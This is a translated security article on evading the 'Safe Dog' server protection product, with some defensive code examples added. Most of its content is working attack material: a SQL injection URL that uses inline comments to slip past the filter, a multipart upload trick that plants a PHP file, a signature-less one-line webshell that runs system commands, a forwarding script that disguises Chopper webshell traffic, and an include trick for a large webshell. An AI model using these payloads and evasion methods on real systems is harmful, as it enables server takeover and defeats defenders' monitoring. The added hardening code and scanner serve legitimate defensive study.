All-round security dog bypass

Source: Internet
Author: User

I. Preface

Safe Dog (安全狗) is a well-known server security hardening product, said to have a user base of 500,000 (50W). After some research I found that several of its protection functions, such as SQL injection filtering, upload filtering and anti-webshell, can be bypassed. This article walks through them.

II. Test environment

The test environment is:

Chinese version of Win2003 SP2 + PHP 5.3.28 + MySQL 5.1.72

Website Safe Dog, IIS version 3.2.08417

III. SQL injection bypass

Let's start by writing a PHP page that has a SQL injection vulnerability (the query is built by string concatenation; this is the intentionally vulnerable test page):

<?php
$uid = $_REQUEST['id'];
if (!$conn = @mysql_connect("localhost", "root", "123456"))
    die('<font size=+1>An Error occured</font>');
if (!@mysql_select_db("supe", $conn))
    die("<font size=+1>An Error occured</font>");
$text = "SELECT * FROM supe_members WHERE uid=" . $uid;   // user input concatenated into SQL
$rs = mysql_query($text, $conn);
while ($rom = mysql_fetch_array($rs))
{
    echo $rom["username"];
}
?>

I'm using the Supesite database. The SQL injection is obvious and can be exploited successfully when Safe Dog is not installed:

Once Safe Dog is installed, the injected statement is intercepted:

Testing suggests that Safe Dog's rule for this case matches something like \s+and, so any way of removing the space should work. An ordinary comment /**/ is not enough; Safe Dog blocks that too. Oddly, the MySQL inline (conditional) comment /*!and*/ is not intercepted at all.

The following statement successfully bypasses the SQL injection filter:

http://192.168.200.115/inj.php?id=1/*!and*/1=2/*!union*//*!select*/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17

Some people say this only works for POST injection, but I tested the latest version of Safe Dog and GET injection can be bypassed this way as well.
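The hardened counterpart of inj.php, as an added example that is not from the original article. It shows the real fix (a bound parameter, so no filter is needed for correctness) and, for anyone who still runs a keyword filter, the normalisation step such a filter needs: MySQL executes the body of /*! ... */, so the filter must see "1 and 1=2" where the raw request says "1/*!and*/1=2". Table and column names are those of the article's Supesite test database; the PDO connection is assumed to exist.

```php
<?php
// Added example, not from the original article: hardened counterpart of
// inj.php, in two independent layers.
//   Layer 1 (the real fix): bind the uid instead of concatenating it.
//   Layer 2 (only if a keyword filter is used at all): normalise MySQL
//   inline comments first, because the server executes the body of
//   /*! ... */ as SQL, so "1/*!and*/1=2" and "1 and 1=2" are the same
//   query to MySQL even though they differ to a \s+and regex.

// Layer 2: replace /*!...*/ by its body and /**/ by a space, then collapse
// whitespace, so a rule such as \s+and sees the statement MySQL will see.
function normalise_sql_input(string $s): string {
    $s = preg_replace('~/\*!\d*\s*(.*?)\*/~s', ' $1 ', $s);   // executed comment body
    $s = preg_replace('~/\*.*?\*/~s', ' ', $s);               // ignored comment
    return trim(preg_replace('~\s+~', ' ', $s));
}

function looks_like_injection(string $s): bool {
    return (bool) preg_match('~\b(and|or|union|select)\b~i', normalise_sql_input($s));
}

// Layer 1: uid is an integer column, so reject anything that is not a small
// integer and bind the value; the query text never contains user input.
function fetch_username(PDO $db, string $uid): ?string {
    if (!preg_match('~^\d{1,10}$~', $uid)) {
        return null;
    }
    $stmt = $db->prepare('SELECT username FROM supe_members WHERE uid = ?');
    $stmt->execute([(int) $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['username'];
}

// The filter alone can be exercised without a database, on the article's
// GET payload and on a benign value.
$payload = '1/*!and*/1=2/*!union*//*!select*/1,2,version(),4';
echo normalise_sql_input($payload), "\n";   // the statement MySQL actually parses
var_dump(looks_like_injection($payload));   // the article's payload
var_dump(looks_like_injection('42'));       // a benign uid
```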

IV. File upload bypass

Safe Dog's anti-upload protection also works at the web layer, that is, it parses the HTTP protocol to block uploads. As Yuange put it, security here is a conditional statement, which clearly does not meet security requirements: checking only the HTTP layer cannot guarantee what happens at the file-system layer.

Suppose you have the following PHP upload function (intentionally without any extension check, so that only Safe Dog stands between the client and the upload directory):

<?php
if ($_FILES["file"]["error"] > 0)
{
    echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
}
else
{
    echo "Upload: " . $_FILES["file"]["name"] . "<br />";
    echo "Type: " . $_FILES["file"]["type"] . "<br />";
    echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
    echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    if (file_exists("upload/" . $_FILES["file"]["name"]))
    {
        echo $_FILES["file"]["name"] . " already exists. ";
    }
    else
    {
        // the client-supplied file name is used as-is for the stored file
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
    }
}
?>

<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>

Then configure Safe Dog to prohibit uploading .php files:

Uploading a PHP file through the browser is now blocked:

We capture the upload HTTP request with Burp and modify the POST data by hand. Skipping the experiments and going straight to the result: when an extra file name and content are added so that the two file names in the request are inconsistent, Safe Dog's protection is bypassed and the PHP file is uploaded. The reason is that Safe Dog matches on the first file name, test.jpg, which satisfies its rule, while the web server saves the file under the second file name, test.php. The logic amounts to if (security_check(a)) { do(b) }, which makes the security check useless, and the PHP file is uploaded successfully:

Such upload data may not be RFC compliant, but it achieves the purpose of bypassing the interception. The conclusion is that each kind of security check must be performed at the corresponding layer; it must not be taken for granted that the web layer can do what the system layer should do.
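A hardened replacement for the upload.php above, as an added example that is not from the original article. It applies the article's conclusion: every decision is made by the handler that stores the file, on the exact $_FILES entry that move_uploaded_file() will use, so a front-end filter seeing one name while the server saves another has nothing to work with. PHP 7 or later and the upload directory name are assumptions.

```php
<?php
// Added example, not from the original article: hardened upload handler.
// All checks run on the same $_FILES entry that is saved, at the layer that
// saves it, so an inconsistency between what a front-end filter saw and what
// the server stores cannot arise. PHP 7+ and the directory name are assumed.

const UPLOAD_DIR = __DIR__ . '/upload';   // assumed; ideally outside the web root
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Returns the stored path or throws RuntimeException with the reason.
function store_image(array $file): string {
    $err = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    if ($err !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed with code ' . $err);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not a file uploaded via HTTP POST');
    }
    // 1. Extension from the name PHP itself parsed, lower-cased and checked
    //    against an allow list (a deny list such as ".php" is what was bypassed).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        throw new RuntimeException("extension '$ext' is not allowed");
    }
    // 2. Content check on the temporary file, not on the client-sent MIME type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content is not a valid $ext image");
    }
    // 3. Server-chosen file name: the client name never reaches the file system.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move the uploaded file');
    }
    return $dest;
}

if (isset($_FILES['file'])) {
    try {
        echo 'Stored as ' . htmlspecialchars(basename(store_image($_FILES['file'])));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```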

V. One-line webshell bypass

For an attacker, a very annoying thing about Safe Dog is that webshells cannot be used. Let's see how to get around Safe Dog's interception of a one-line webshell.

The first thing to know is that Safe Dog's anti-webshell check still relies on file signatures plus HTTP inspection, but a webshell really executes at the script layer; a check performed at a different layer from the one where execution happens can easily be circumvented. Because in PHP a function name can be a variable, the file contains no recognisable signature at all. Upload the following PHP:

<?php
$_REQUEST['a']($_REQUEST['b']);
?>

Then call it from the browser:

http://192.168.200.115/small.php?a=system&b=dir

The system command is executed successfully, and PHP code can be executed as well:

http://192.168.200.115/small.php?a=assert&b=phpinfo();

VI. Chopper bypass

Testing showed that although the one-line shell executes successfully, it cannot be used from Chopper (the "kitchen knife" client), and some people find a bare one-liner too troublesome to use without Chopper. Analysis shows that Safe Dog intercepts Chopper's HTTP requests: Chopper Base64-encodes the eval payload in its POST data, and Safe Dog relies on exactly these characteristics to intercept. So to use Chopper normally, a local forwarder is needed that first transforms the characteristic data. The idea is similar to local forwarding for pseudo-static injection.

First set up a web server locally, then write a PHP forwarder:

<?php
$target = "http://192.168.200.115/small.php";   // the address of the one-line shell above
$poststr = '';
$i = 0;
foreach ($_POST as $k => $v)
{
    if (strstr($v, "base64_decode"))
    {
        $v = str_replace("base64_decode(", "", $v);
        $v = str_replace("))", ")", $v);
    }
    else
    {
        if ($k === "z0")
            $v = base64_decode($v);
    }
    $pp = $k . "=" . urlencode($v);
    // echo($pp);
    if ($i != 0)
    {
        $poststr = $poststr . "&" . $pp;
    }
    else
    {
        $poststr = $pp;
    }
    $i = $i + 1;
}
$ch = curl_init();
$curl_url = $target . "?" . $_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>

In other words, the eval payload is Base64-decoded locally before being POSTed to the target machine. Set the URL of the local forwarding script in Chopper:

Now Chopper can connect to the one-line shell from before:

This makes Chopper usable, but there is really no need to stick with Chopper. A better, Chopper-like tool worth recommending is Altman:

Http://www.i0day.com/1725.html

Its biggest advantage is that it is open source. Against a product like Safe Dog that intercepts based on characteristic strings, simply changing those strings in the source code means it will never be intercepted. Of course, you have to make that change to the code yourself.

VII. Large webshell ("big horse") bypass

A one-line shell is limited after all; what if you want to use a large webshell (大马, "big horse")? The traditional include trick still works. Upload a big.php with the following content:

<?php
include('logo.txt');
?>

Then paste the large webshell into logo.txt. This successfully bypasses Safe Dog's interception and the webshell executes:

So the large webshell also runs without trouble.
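A token-based check for the two signature-less shapes shown in sections V and VII, as an added example that is not from the original article: a callable built from a request superglobal ($_REQUEST['a']($_REQUEST['b'])) and an include of a non-PHP file (include('logo.txt')). Working on PHP tokens rather than byte signatures is precisely what the file-characteristic check described above lacks; the three sample sources are constructed for the demonstration.

```php
<?php
// Added example, not from the original article: a small token-based scanner
// for the two signature-less webshell shapes above. It uses PHP's own
// tokenizer, so no literal string such as "eval" or "base64_decode" is
// needed to flag them. The sample sources at the bottom are constructed.
function scan_php_source(string $src): array {
    $findings = [];
    // drop whitespace and comments so that adjacent tokens can be compared directly
    $toks = array_values(array_filter(token_get_all($src), function ($t) {
        return !is_array($t) || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true);
    }));
    $n = count($toks);
    for ($i = 0; $i < $n; $i++) {
        $t = $toks[$i];
        if (!is_array($t)) continue;
        // Shape 1: $_REQUEST/$_GET/$_POST/$_COOKIE [ ... ] (  -> request-controlled callee
        if ($t[0] === T_VARIABLE && in_array($t[1], ['$_REQUEST', '$_GET', '$_POST', '$_COOKIE'], true)
            && ($toks[$i + 1] ?? null) === '[') {
            $j = $i + 2;
            while ($j < $n && $toks[$j] !== ']') $j++;   // skip the index expression
            if (($toks[$j + 1] ?? null) === '(') {
                $findings[] = "line {$t[2]}: function name taken from {$t[1]}";
            }
        }
        // Shape 2: include/require of a literal file name that does not end in .php
        if (in_array($t[0], [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE], true)) {
            $j = (($toks[$i + 1] ?? null) === '(') ? $i + 2 : $i + 1;
            $arg = $toks[$j] ?? null;
            if (is_array($arg) && $arg[0] === T_CONSTANT_ENCAPSED_STRING
                && !preg_match('~\.php[\'"]$~i', $arg[1])) {
                $findings[] = "line {$t[2]}: include of non-PHP file {$arg[1]}";
            }
        }
    }
    return $findings;
}
$samples = [   // constructed: the two shells from the article and one benign page
    'small.php' => "<?php \$_REQUEST['a'](\$_REQUEST['b']); ?>",
    'big.php'   => "<?php include('logo.txt'); ?>",
    'page.php'  => "<?php include('header.php'); echo htmlspecialchars(\$_GET['q']); ?>",
];
foreach ($samples as $name => $src) {
    $f = scan_php_source($src);
    echo $name, ': ', $f ? implode('; ', $f) : 'no findings', "\n";
}
```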

VIII. Concluding remarks

The above bypasses Safe Dog's protection from several angles: SQL injection, upload and webshell. Safe Dog may already know about some of these bypass methods, so why have they not been fixed? Possibly for fear that stricter filtering would break certain applications. I think making a trade-off between security and compatibility is understandable, but resolving that trade-off well is exactly where security researchers add value.

A few complaints beyond the topic itself: many security companies actually operate as software companies, treating security software purely as development work and ignoring the value of security research. The general principle of protection is very simple, but it is hard to ensure security without affecting the application, and without researchers who deeply understand vulnerabilities and attacks, security products cannot get better. I hope security companies will be less utilitarian and pay more attention to researchers; a security company really cannot be equated with a software company!

The source of this article: http://www.freebuf.com/articles/web/37501.html
